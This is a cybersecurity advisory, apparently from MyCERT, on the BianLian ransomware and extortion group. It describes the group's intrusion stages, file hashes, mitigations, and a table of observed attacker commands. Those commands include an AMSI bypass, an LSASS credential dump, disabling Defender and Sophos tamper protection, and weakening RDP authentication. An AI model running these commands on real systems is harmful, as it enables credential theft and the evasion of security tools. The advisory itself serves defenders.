BianLian is a ransomware developer, deployer, and data extortion cybercriminal group. FBI observed BianLian group targeting organizations in multiple U.S. critical infrastructure sectors since June 2022. In Australia, ACSC has observed BianLian group predominately targeting private enterprises, including one critical infrastructure organization. BianLian group originally employed a doubleextortion model in which they exfiltrated financial, client, business, technical, and personal files for leverage and encrypted victims’ systems. In 2023, FBI observed BianLian shift to primarily exfiltrationbased extortion with victims’ systems left intact, and ACSC observed BianLian shift exclusively to exfiltration-based extortion. BianLian actors warn of financial, business, and legal ramifications if payment is not made.

2.1 Initial access
BianLian group actors gain initial access to networks by leveraging compromised Remote Desktop Protocol (RDP) credentials likely acquired from initial access brokers or via phishing.

2.2 Command and Control
BianLian group actors implant a custom backdoor specific to each victim written in Go (see the Indicators of Compromise Section for an example) and install remote management and access software—e.g., TeamViewer, Atera Agent, SplashTop, AnyDesk—for persistence and command and control.
FBI also observed BianLian group actors create and/or activate local administrator accounts and change those account passwords.

2.3 Defense Evasion
BianLian group actors use PowerShell and Windows Command Shell to disable antivirus tools, specifically Windows defender and Anti-Malware Scan Interface (AMSI). BianLian actors modify the Windows Registry to disable tamper protection for Sophos SAVEnabled, SEDEenabled, and SAVService services, which enables them to uninstall these services. See Appendix: Windows PowerShell and Command Shell Activity for additional information, including specific commands they have used.

2.4 Discovery
BianLian group actors use a combination of compiled tools, which they first download to the victim environment, to learn about the victim’s environment. BianLian group actors have used: 
• Advanced Port Scanner, a network scanner used to find open ports on network computers and retrieve versions of programs running on the detected ports.
• SoftPerfect Network Scanner (netscan.exe), a network scanner that can ping computers, scan ports, and discover shared folders. 
• SharpShares to enumerate accessible network shares in a domain. 
• PingCastle to enumerate Active Directory (AD). PingCastle provides an AD map to visualize the hierarchy of trust relationships. 
BianLian actors also use native Windows tools and Windows Command Shell to: 
• Query currently logged-in users. 
• Query the domain controller to identify:

  • All groups.
  • Accounts in the Domain Admins and Domain Computers groups.
  • All users in the domain. 

• Retrieve a list of all domain controllers and domain trusts. 
• Identify accessible devices on the network. 

2.5 Credential Access
BianLian group uses valid accounts for lateral movement through the network and to pursue other follow-on activity. To obtain the credentials, BianLian group actors use Windows Command Shell to find unsecured credentials on the local machine. FBI also observed BianLian harvest credentials from the Local Security Authority Subsystem Service (LSASS) memory, download RDP Recognizer (a tool that could be used to brute force RDP passwords or check for RDP vulnerabilities) to the victim system, and attempt to access an Active Directory domain database (NTDS.dit).
In one case, FBI observed BianLian actors use a portable executable version of an Impacket tool (secretsdump.py) to move laterally to a domain controller and harvest credential hashes from it. 
Note: Impacket is a Python toolkit for programmatically constructing and manipulating network protocols. Through the Command Shell, an Impacket user with credentials can run commands on a remote device using the Windows management protocols required to support an enterprise network.

2.6 Presistence and Lateral Movement
BianLian group actors use PsExec and RDP with valid accounts for lateral movement. Prior to using RDP, BianLian actors used Command Shell and native Windows tools to add user accounts to the local Remote Desktop Users group, modified the added account’s password, and modified Windows firewall rules to allow incoming RDP traffic. See Appendix: Windows PowerShell and Command Shell Activity for additional information. 
In one case, FBI found a forensic artifact (exp.exe) on a compromised system that likely exploits the Netlogon vulnerability (CVE-2020-1472) and connects to a domain controller.

2.7 Collection
FBI observed BianLian group actors using malware (system.exe) that enumerates registry and files and copies clipboard data from users.

2.8 Exfiltration and Impact
BianLian group actors search for sensitive files using PowerShell scripts (See Appendix: Windows PowerShell and Command Shell Activity) and exfiltrate them for data extortion. Prior to January 2023, BianLian actors encrypted files after exfiltration for double extortion. 
BianLian group uses File Transfer Protocol (FTP) and Rclone, a tool used to sync files to cloud storage, to exfiltrate data. FBI observed BianLian group actors install Rclone and other files in generic and typically unchecked folders such as programdata\vmware and music folders. ACSC observed BianLian group actors use Mega file-sharing service to exfiltrate victim data. 
BianLian’s encryptor (encryptor.exe) modified all encrypted files to have the .bianlian extension. The encryptor created a ransom note, Look at this instruction.txt, in each affected directory (see Figure 1 for an example ransom note.) According to the ransom note, BianLian group specifically looked for, encrypted, and exfiltrated financial, client, business, technical, and personal files.


Figure 1: BianLian Sample Ransom Note (Look at this instruction.txt)

If a victim refuses to pay the ransom demand, BianLian group threatens to publish exfiltrated data to a leak site maintained on the Tor network. The ransom note provides the Tox ID A4B3B0845DA242A64BF17E0DB4278EDF85855739667D3E2AE8B89D5439015F07E81D12D767FC, which does not vary across victims. The Tox ID directs the victim organization to a Tox chat via https://qtox.gitbhub[.]io and includes an alternative contact email address (swikipedia@onionmail[.]org or xxx@mail2tor[.]com). The email address is also the same address listed on the group’s Tor site under the contact information section. Each victim company is assigned a unique identifier included in the ransom note. BianLian group receives payments in unique cryptocurrency wallets for each victim company. 
BianLian group engages in additional techniques to pressure the victim into paying the ransom; for example, printing the ransom note to printers on the compromised network. Employees of victim companies also reported receiving threatening telephone calls from individuals associated with BianLian group.
 

3.0 Indicators of Compromise
See Table 1 for IOCs obtained from FBI investigations as of March 2023.

NameSHA-256 HashDescription
def.exe7b15f570a23a5c5ce8ff942da60834a9d0549ea3ea9f34f900  a09331325df893Malware associated with BianLian intrusions, which is an example of a possible backdoor developed by BianLian group.
encryptor.exe1fd07b8d1728e416f897bef4f1471126f9b18ef108eb952f4b  75050da22e8e43Example of a BianLian encryptor.
exp.exe0c1eb11de3a533689267ba075e49d93d55308525c04d6aff  0d2c54d1f52f5500Possible NetLogon vulnerability (CVE-2020- 1472) exploitation.
system.exe40126ae71b857dd22db39611c25d3d5dd0e60316b72830e  930fba9baf23973ceEnumerates registry and files. Reads clipboard data.

Table 1: BianLian Ransomware and Data Extortion Group IOCs

Through FBI investigation as of March 2023, FBI has observed BianLian actors use the commands in Table 2. ACSC has observed BianLian actors use some of the same commands.

 

CommandUse

[Ref].Assembly.GetType(‘System.Management

.Automation.AmsiUtils’).GetField(‘amsiInitFaile d’,’NonPublic,* Static’).SetValue($null,$true)

Disables the AMSI on Windows. AMSI is a built-in feature on Windows 10 and newer that

provides an interface for anti-malware scanners to inspect scripts prior to execution. When AMSI is disabled, malicious scripts may bypass antivirus solutions and execute undetected.

cmd.exe /Q /c for /f “tokens=1,2 delims= “ ^%A in (‘”tasklist /fi “Imagename eq lsass.exe” | find “lsass””’) do rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump

^%B \Windows\Temp\<file>.csv full

Creates a memory dump lsass.exe process and saves it as a CSV filehttps://attack.mitre.org/versions/v12/techniq ues/T1003/001/. BianLian actors used it to harvest credentials from lsass.exe.

cmd.exe /Q /c net user <admin> /active:yes 1>

\\127.0.0.1\C$\Windows\Temp\<folder> 2>&1

Activates the local Administrator account.
cmd.exe /Q /c net user "<admin>"<password> 1> \\127.0.0.1\C$\Windows\Temp\<folder> 2>&1Changes the password of the newly activated local Administrator account.

cmd.exe /Q /c quser 1>

\\127.0.0.1\C$\Windows\Temp\<folder> 2>&1

Executes quser.exe to query the currently logged-in users on a machine. The command is provided arguments to run quietly and exit upon completion, and the output is directed to the \Windows\Temp directory.

dism.exe /online /Disable-Feature

/FeatureName:Windows-Defender /Remove

/NoRestart

Using the Deployment Image Servicing and Management (DISM) executable file, removes the Windows Defender feature.
dump.exe -no-pass -just-dc user.local/<fileserver.local>\@<local_ip>Executes secretsdump.py, a Portable Executable version of an Impacket tool. Used to dump password hashes from domain controllers.
exp.exe -n <fileserver.local> -t <local_ip>Possibly attempted exploitation of the NetLogon vulnerability (CVE-2020-1472).

findstr /spin "password" *.*

>C:\Users\training\Music\<file>.txt

Searches for the string password in all files in the current directory and its subdirectories and puts the output to a file.
ldap.exe -u user\<user> -p <password> ldap://<local_ip>Connects to the organization’s Lightweight Directory Access Protocol (LDAP) server.
logoffLogs off the current user from a Windows session. Can be used to log off multiple users at once.
mstscLaunches Microsoft Remote Desktop Connection client application in Windows.
net group /domainRetrieves a list of all groups from the domain controller.
net group 'Domain Admins' /domainQueries the domain controller to retrieve a list of all accounts from Domain Admins group.
net group 'Domain Computers' /domainQueries the domain controller to retrieve a list of all accounts from Domain Computers group.
net user /domainQueries the domain controller to retrieve a list of all users in the domain.

net.exe localgroup "Remote Desktop Users"

<user> /add

Adds a user account to the local Remote Desktop Users group.
net.exe user <admin> <password> /domainModifies the password for the specified account.
netsh.exe advfirewall firewall add rule "name=allow RemoteDesktop" dir=in * protocol=TCP localport=<port num> action=allowAdds a new rule to the Windows firewall that allows incoming RDP traffic.
netsh.exe advfirewall firewall set rule "group=remote desktop" new enable=YesEnables the pre-existing Windows firewall rule group named Remote Desktop. This rule group allows incoming RDP traffic.
nltest /dclistRetrieves a list of domain controllers.
nltest /domain_trustsRetrieves a list of domain trusts.
ping.exe -4 -n 1 *

Sends a single ICMP echo request packet to all

devices on the local network using the IPv4 protocol. The output of the command will show if the device is reachable or not.

quser; ([adsisearcher]"(ObjectClass=computer)").Find All().count;([adsisearcher]"(ObjectClass=user)")

.FindAll().count;[Security.Principal.WindowsIde ntity]::GetCurrent() | select name;net user "$env:USERNAME" /domain; (Get-WmiObject - class Win32_OperatingSystem).Caption; Get- WmiObject -Namespace root\cimv2 -Class Win32_ComputerSystem; net group "domain admins" /domain; nltest /dclist:; nltest

/DOMAIN_TRUSTS

Lists the current Windows identity for the logged-in user and displays the user's name. Uses the Active Directory Services Interface (ADSI) to search for all computer and user objects in the domain and returns counts of the quantities found. Lists information about the current user account from the domain, such as the user's name, description, and group memberships. Lists information about the operating system installed on the local computer. Lists information about the "Domain Admins" group from the domain. Lists all domain controllers in the domain. Displays information about domain trusts.

reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentC

ontrolSet\Control\Terminal * Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

Adds/overwrites a new Registry value to disable user authentication for RDP connections.

reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentC

ontrolSet\Control\Terminal Server" /* v fAllowToGetHelp /t REG_DWORD /d 1 /f

Adds/overwrites a new Registry value to allow a user to receive help from Remote Assistance.

reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentC

ontrolSet\Services\Sophos Endpoint * Defense\TamperProtection\Config" /t REG_DWORD /v SAVEnabled /d 0 /f

Adds/overwrites a new Registry value to disable tamper protection for Sophos antivirus named SAVEnabled.

reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentC

ontrolSet\Services\Sophos Endpoint * Defense\TamperProtection\Config" /t REG_DWORD /v SEDEnabled /d 0 /f

Adds/overwrites a new Registry value to disable tamper protection for Sophos antivirus named SEDEnabled.

reg.exe ADD * HKEY_LOCAL_MACHINE\SOFTWARE\WOW

6432Node\Sophos\SAVService\TamperProtecti on /t REG_DWORD /v Enabled /d 0 /f

Adds/overwrites a new registry value to disable tamper protection for a Sophos antivirus service called SAVService.
reg.exe copy hklm\system\CurrentControlSet\services\tvnser ver * hklm\system\CurrentControlSet\control\safeboo t\network\tvnserver /s /fCopies the configuration settings for the tvnserver service to a new location in the registry that will be used when the computer boots into Safe Mode with Networking. This allows the service to run with the same settings in Safe Mode as it does in normal mode.

s.exe /threads:50 /ldap:all /verbose

/outfile:c:\users\<user>\desktop\1.txt

Executes SharpShares.

schtasks.exe /RU SYSTEM /create /sc ONCE

/<user> /tr "cmd.exe /crundll32.exe c:\programdata\netsh.dll,Entry" /ST 04:43

Creates a Scheduled Task run as SYSTEM at 0443 AM. When the task is run, cmd.exe uses crundll32.exe to run the DLL file netsh.dll. (It is likely that netsh.dll is a malware file and not associated with netsh.)
start-process PowerShell.exe -arg C:\Users\Public\Music\<file>.ps1 -WindowStyle HiddenExecutes a PowerShell script, while keeping the PowerShell window hidden from the user.

Table 2: PowerShell and Windows Command Shell Activity

4.0 Recommendations
MyCERT recommend organizations implement the recommendation below to improve your organization’s cybersecurity posture on the basis of the threat actor’s activity.

  • Reduce threat of malicious actors using remote access tools by: 
    • Auditing remote access tools on your network to identify currently used and/or authorized software.
    • Reviewing logs for execution of remote access software to detect abnormal use of programs running as a portable executable.
    • Using security software to detect instances of remote access software only being loaded in memory. 
    • Requiring authorized remote access solutions only be used from within your network over approved remote access solutions, such as virtual private networks (VPNs) or virtual desktop interfaces (VDIs).
    • Blocking both inbound and outbound connections on common remote access software ports and protocols at the network perimeter.
  • Implement application controls to manage and control execution of software.
  • Strictly limit the use of RDP and other remote desktop services.
  • Disable command-line and scripting activities and permissions.
  • Restrict the use of PowerShell.
  • Update Windows PowerShell or PowerShell Core.
  • Enable enhanced PowerShell logging.
  • Configure the Windows Registry to require User Account Control (UAC) approval for any PsExec operations.
  • Review domain controllers, servers, workstations, and active directories.
  • Audit user accounts.
  • Implement time-based access for accounts set at the admin level and higher.

In addition, MyCERT recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the impact and risk of compromise by ransomware or data extortion actors:

  • Implement a recovery plan.
  • Maintain offline backups of data.
  • Require phishing-resistant multifactor authentication.
  • Keep all operating systems, software, and firmware up to date.
  • Segment networks.
  • Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool.
  • Install, regularly update, and enable real time detection for antivirus software.
  • Disable unused ports.
  • Consider adding an email banner to emails.
  • Ensure all backup data is encrypted, immutable.

Generally, MyCERT advises the users of this devices to be updated with the latest security announcements by the vendor and follow best practice security policies to determine which updates should be applied.

For further enquiries, please contact MyCERT through the following channels:

E-mail: cyber999[at]cybersecurity.my 
Phone: 1-300-88-2999 (monitored during business hours) 
Mobile: +60 19 2665850 (24x7 call incident reporting) 
Business Hours: Mon - Fri 09:00 -18:00 MYT 
Web: https://www.mycert.org.my 
Twitter: https://twitter.com/mycert 
Facebook: https://www.facebook.com/mycert.org.my

5.0    References

Read More
Showing 1-10 of 10 items.
(not set)
(not set)
(not set)
(not set)
(not set)
(not set)
(not set)
(not set)
(not set)
(not set)
Popular Advisories
Archives